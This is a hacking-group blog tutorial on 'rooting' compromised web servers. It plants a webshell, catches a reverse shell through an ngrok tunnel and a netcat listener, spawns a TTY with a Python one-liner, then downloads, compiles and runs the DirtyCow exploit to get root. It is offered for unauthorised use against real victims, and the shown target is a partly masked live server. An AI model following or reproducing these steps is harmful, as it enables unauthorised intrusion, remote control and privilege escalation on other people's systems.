Server Rooting with Ngrok 2017

Hie
very welcome to Lulzsec blog

Today we will talk about ROOTING of server using NGROK 
============================================
Dedicated to my indian friends who has problem with rooting the server


Many friends has requested me to make this tutorial :) so today we are here ..
Most welcome to Hexking,  jama7 , R00t Destroyer , gaurav , Red Hex , Dreagon , vampire kid and all the supporters of lulzsec india

Lets start ...

===========================================

* SEE MY LAST POST ABOUT NGROK THEN CONTINUE WITH THIS POST *

Link here   ..

For that few things are required
______________________
| 1) Ngrok                           |
| 2) Netcat                           |
| 3) webshell on server     |
| 4) Root exploit                 |
---------------------------------

We can use any shell , if you dont have one download it from Github ,
I suggest you to download WSO shell ( https://github.com/wso-shell/WSO/blob/master/WSO.php )
if you want our private shell
the link will provided soon here (  *  )


Step 1 : First thing first make sure your ngrok is running  (else you will be end up with "mera connect nahi ho raha  " )

Note : In some case server wont connect because sever may have restrict back connect or script which perform back connect get deleted from server (happen in very rare case for that we have another solution)

Step 2 : Make sure Netcat is listening on port , in my case i am using ( 1337 )

Command for Netcat :   nc -lnvp 1337 

ok this is grate

Ngrok has provided us a (dns , ip or url ) and port in my case this is

ip : 0.tcp.ngrok.io
port : 15288

and Netcat is listening on 1337

Open web shell i am using IndoXploit shell
go to network
see below

Then type your Ngrok ip and port like this .

now press the Reverse

After that see your netcat CMD  it will be showing like this :

Now we need TTY shell you can use from this link ( https://netsec.ws/?p=337 )

or just copy this and paste : python -c 'import pty; pty.spawn("/bin/sh")'

After that you need to search the root exploit for this server .
as you can see i have done id and uname -a
it will show me id which is currently apache

id : [ uid=48(apache) gid=48(apache) groups=48(apache) ]

uname -a  :  Linux xxxxxxxx.pk 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

see below image

 Now we need to download root exploit which will give us root privilege of this server

in this tutorial i am using dirty cow it can be used for any server till september 2016 .

link is here ( https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c )

download and upload it into the server like i have did in my case it is  po.c
*USE UPLOAD FUNCTION WHICH IS PRESENT IN SHELL TO UPLOAD .C FILE*

 

command : ls *.c

now we have to compile the po.c File

using this command : 

 gcc -pthread po.c -o panda -lcrypt

 now we get the compiled file of that po.c in panda

 

next we have to permission to it

command : chmod +x panda

now we need to execute the compiled file

just simply pressing

./panda 

([dot][slash]panda)

after that it will ask for password put the password

ok now press ctr + c close the netcat CMD

then re connect to the server 

then type 

su panda

then it will ask for password put your password again 😀😀😀😀

see what happen next in below image 

now just type id command 

id :  uid=0(panda) gid=0(root) groups=0(root)

and yahh !!! you are root now

get the ssh connection [ see this topic will be covered in next post ]

Thank you hope you like it if you have any questions just comment below  💗

======================================================

Any thing i need to improve or any new topic you guys want let me know

dont forget to subscribe and like our facebook page

link  :  https://www.facebook.com/LulzSecIndiaHQ/

=======================================================